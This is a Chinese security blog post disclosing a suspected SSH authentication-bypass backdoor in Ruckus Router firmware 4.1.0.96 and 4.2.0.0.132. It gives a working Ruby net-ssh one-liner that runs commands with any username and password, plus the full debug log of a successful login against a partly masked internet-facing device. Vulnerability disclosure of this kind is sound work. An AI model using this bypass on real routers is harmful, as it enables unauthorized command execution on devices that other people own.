优科路由器(Ruckus Router)疑似后门分析

waynewong  3279天前

一,概要

近期,白帽汇安全团队在分析netscreen后门的过程中,无意中发现优科路由器(Ruckus Router)某版本也存在疑似后门行为,在没有账号的情况下可以直接执行命令,目前已经探测出互联网至少数百台设备受影响。

已经发现受影响的版本包括4.1.0.96和4.2.0.0.132,暂时我们还不太确定是否属于已知问题。

二,技术分析

正常情况下通过ssh连接服务器,会要求输入用户名和密码,比如:

$ ssh 8.40.x.x

Please login: admin
password : 
Login incorrect

Please login:

我们利用ruby环境下的net-ssh执行ssh协议,打印调试信息:

$ irb
2.1.5 :233 > require 'net/ssh'
2.1.5 :233 > Net::SSH.start('8.40.x.x', 'any', :password => %q|anychar|,:verbose=>:debug,:auth_methods => ["password"]) do |ssh|; puts ssh.exec!("get version"); end

D, [2015-12-24T13:36:52.577626 #6230] DEBUG -- net.ssh.transport.session[3fc639464fa8]: establishing connection to 8.40.x.x:22

D, [2015-12-24T13:36:52.935203 #6230] DEBUG -- net.ssh.transport.session[3fc639464fa8]: connection established

I, [2015-12-24T13:36:52.935285 #6230]  INFO -- net.ssh.transport.server_version[3fc6390b5ba0]: negotiating protocol version

D, [2015-12-24T13:36:53.342534 #6230] DEBUG -- net.ssh.transport.server_version[3fc6390b5ba0]: remote is `SSH-2.0-dropbear_0.48'

D, [2015-12-24T13:36:53.342590 #6230] DEBUG -- net.ssh.transport.server_version[3fc6390b5ba0]: local is `SSH-2.0-Ruby/Net::SSH_3.0.1 x86_64-darwin14.0'

D, [2015-12-24T13:36:53.756625 #6230] DEBUG -- socket[3fc6394645f8]: read 344 bytes

D, [2015-12-24T13:36:53.756732 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 0 type 20 len 340

I, [2015-12-24T13:36:53.756796 #6230]  INFO -- net.ssh.transport.algorithms[3fc6390b4598]: got KEXINIT from server

I, [2015-12-24T13:36:53.756848 #6230]  INFO -- net.ssh.transport.algorithms[3fc6390b4598]: sending KEXINIT

D, [2015-12-24T13:36:53.757020 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 0 type 20 len 1684

D, [2015-12-24T13:36:53.757140 #6230] DEBUG -- socket[3fc6394645f8]: sent 1688 bytes

I, [2015-12-24T13:36:53.757176 #6230]  INFO -- net.ssh.transport.algorithms[3fc6390b4598]: negotiating algorithms

D, [2015-12-24T13:36:53.757274 #6230] DEBUG -- net.ssh.transport.algorithms[3fc6390b4598]: negotiated:

* kex: diffie-hellman-group1-sha1

* host_key: ssh-rsa

* encryption_server: aes128-cbc

* encryption_client: aes128-cbc

* hmac_client: hmac-sha1

* hmac_server: hmac-sha1

* compression_client: none

* compression_server: none

* language_client: 

* language_server: 

D, [2015-12-24T13:36:53.757299 #6230] DEBUG -- net.ssh.transport.algorithms[3fc6390b4598]: exchanging keys

D, [2015-12-24T13:36:53.757886 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 1 type 30 len 140

D, [2015-12-24T13:36:53.757930 #6230] DEBUG -- socket[3fc6394645f8]: sent 144 bytes

D, [2015-12-24T13:36:57.345886 #6230] DEBUG -- socket[3fc6394645f8]: read 720 bytes

D, [2015-12-24T13:36:57.346065 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 1 type 31 len 700

D, [2015-12-24T13:36:57.415697 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 2 type 21 len 20

D, [2015-12-24T13:36:57.415823 #6230] DEBUG -- socket[3fc6394645f8]: sent 24 bytes

D, [2015-12-24T13:36:57.416003 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 2 type 21 len 12

D, [2015-12-24T13:36:57.416275 #6230] DEBUG -- net.ssh.authentication.session[3fc6388b4078]: beginning authentication of `any'

D, [2015-12-24T13:36:57.416374 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 3 type 5 len 28

D, [2015-12-24T13:36:57.416431 #6230] DEBUG -- socket[3fc6394645f8]: sent 52 bytes

D, [2015-12-24T13:36:58.155451 #6230] DEBUG -- socket[3fc6394645f8]: read 52 bytes

D, [2015-12-24T13:36:58.155590 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 3 type 6 len 28

D, [2015-12-24T13:36:58.155742 #6230] DEBUG -- net.ssh.authentication.session[3fc6388b4078]: trying password

D, [2015-12-24T13:36:58.155889 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 4 type 50 len 60

D, [2015-12-24T13:36:58.155950 #6230] DEBUG -- socket[3fc6394645f8]: sent 84 bytes

D, [2015-12-24T13:36:58.490987 #6230] DEBUG -- socket[3fc6394645f8]: read 36 bytes

D, [2015-12-24T13:36:58.491177 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 4 type 52 len 12

D, [2015-12-24T13:36:58.491277 #6230] DEBUG -- net.ssh.authentication.methods.password[3fc6388b3ee8]: password succeeded

D, [2015-12-24T13:36:58.491429 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 5 type 90 len 44

D, [2015-12-24T13:36:58.491552 #6230] DEBUG -- socket[3fc6394645f8]: sent 68 bytes

D, [2015-12-24T13:36:58.876109 #6230] DEBUG -- socket[3fc6394645f8]: read 52 bytes

D, [2015-12-24T13:36:58.876301 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 5 type 91 len 28

I, [2015-12-24T13:36:58.876449 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_open_confirmation: 0 0 8000 8000

I, [2015-12-24T13:36:58.876648 #6230]  INFO -- net.ssh.connection.channel[3fc6388b2840]: sending channel request "env"

D, [2015-12-24T13:36:58.876769 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 6 type 98 len 44

I, [2015-12-24T13:36:58.876924 #6230]  INFO -- net.ssh.connection.channel[3fc6388b2840]: sending channel request "exec"

D, [2015-12-24T13:36:58.877018 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 7 type 98 len 44

D, [2015-12-24T13:36:58.877221 #6230] DEBUG -- socket[3fc6394645f8]: sent 136 bytes

D, [2015-12-24T13:36:59.291831 #6230] DEBUG -- socket[3fc6394645f8]: read 36 bytes

D, [2015-12-24T13:36:59.292027 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 6 type 99 len 12

I, [2015-12-24T13:36:59.292122 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_success: 0

D, [2015-12-24T13:36:59.296051 #6230] DEBUG -- socket[3fc6394645f8]: read 84 bytes

D, [2015-12-24T13:36:59.296180 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 7 type 94 len 60

I, [2015-12-24T13:36:59.296248 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_data: 0 35b

D, [2015-12-24T13:36:59.691776 #6230] DEBUG -- socket[3fc6394645f8]: read 140 bytes

D, [2015-12-24T13:36:59.691968 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 8 type 96 len 12

I, [2015-12-24T13:36:59.692040 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_eof: 0

D, [2015-12-24T13:36:59.692225 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 9 type 98 len 44

I, [2015-12-24T13:36:59.692342 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_request: 0 exit-status false

D, [2015-12-24T13:36:59.692477 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 10 type 97 len 12

I, [2015-12-24T13:36:59.692523 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_close: 0

D, [2015-12-24T13:36:59.692613 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 8 type 97 len 28

Ruckus Router

Version: 4.2.0.0.132

I, [2015-12-24T13:36:59.692674 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: closing remaining channels (0 open)

 => nil 

2.1.5 :234 > 

在上面的测试代码中,我们可以看到,设定了任意的用户名和任意的密码,再带上我们要执行的命令(这里是get version),我们就能够绕过登陆验证而直接执行命令。

最新评论

secbook  : 
3275天前 回复
leir_  :  其它命令呢?
3275天前 回复
greenboy  :  给个地址**呢
3275天前 回复
LubyRuffy  : 
3275天前 回复
昵称
邮箱
提交评论